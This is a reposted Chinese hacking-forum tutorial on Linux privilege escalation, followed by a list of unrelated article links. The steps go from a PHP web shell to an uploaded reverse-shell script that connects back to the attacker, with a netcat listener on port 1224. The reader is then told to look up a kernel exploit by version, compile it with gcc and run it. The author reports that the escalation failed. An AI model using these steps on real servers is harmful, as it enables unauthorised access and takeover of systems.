linux溢出提权(适合刚学习linux提权的朋友)
来源:互联网 发布:mac上word文档消失了 编辑:程序博客网 时间:2024/06/05 20:31
本帖最后由 wjs 于 2010-4-3 14:26 编辑
作者wjs
qq 825680101
我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0
作者wjs
qq 825680101
我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0
然后执行 ./1.pl 本机IP 1224
然后本机监听nc -vv -l -p 1224,图1 反弹成功
输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,输入uname –r
返回:2.6.18-164.11.1.el5PAE
找对应的exp, 这里地址整理很齐全可以这里下
http://sebug.net/paper/linux_exp/ {此处经本人更改}
命令输入pwd,这个命令是显示当前目录,当前目录就是shell的目录,我在shell上传2.c
然后命令输入
Gcc –o 2 2.c //把2.c编译成可执行文件
chmod +x 2 //给2有执行权限
./2 //执行2,2是溢出的 exp文件。图2
看图可以发现没提权成功,过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下,会有所收获的
- linux溢出提权(适合刚学习linux提权的朋友)
- 对刚接触linux朋友的一点点建议
- 树莓派真的适合学习Linux系统吗?
- 树莓派真的适合学习Linux系统吗?
- 树莓派真的适合学习Linux系统吗?
- 完成了UE4非常简单的第三视角圆球走动,适合像我一样刚接触UE4和蓝图的朋友学习!
- 硬盘安装Linux详解(特别适合光驱坏了和没有光盘的朋友)
- 适合linux的字典
- 适合linux的字典
- 学习linux溢出-1
- 刚学linux的gdb
- 刚学到的Linux指令
- 学习linux两天的笔记(基础篇 适合新手)
- ios与javascript的交互,适合刚接触电商ios与html5混编的朋友,(ios自学笔记)
- 适合Linux的filebench安装
- Linux系统溢出漏洞学习
- fedora9 下安装 gcc(刚学习linux)
- 让j2re,正常显示中文,适合各种linux,需要朋友可以看看。
- fscanf函数
- 一位女测试工程师的成长
- 继承学习1
- oracle表数据恢复2
- erp工程师的基本知识
- linux溢出提权(适合刚学习linux提权的朋友)
- mysql修改主键
- unable to find a medium containing a live file system
- Java2十大经典中文图书
- mysql重建索引
- 汉诺塔问题
- maven eclipse miss required library解决
- Delphi中StrToDateTime函数TFormatSettings参数的使用
- [iPhone开发项目] 团购信息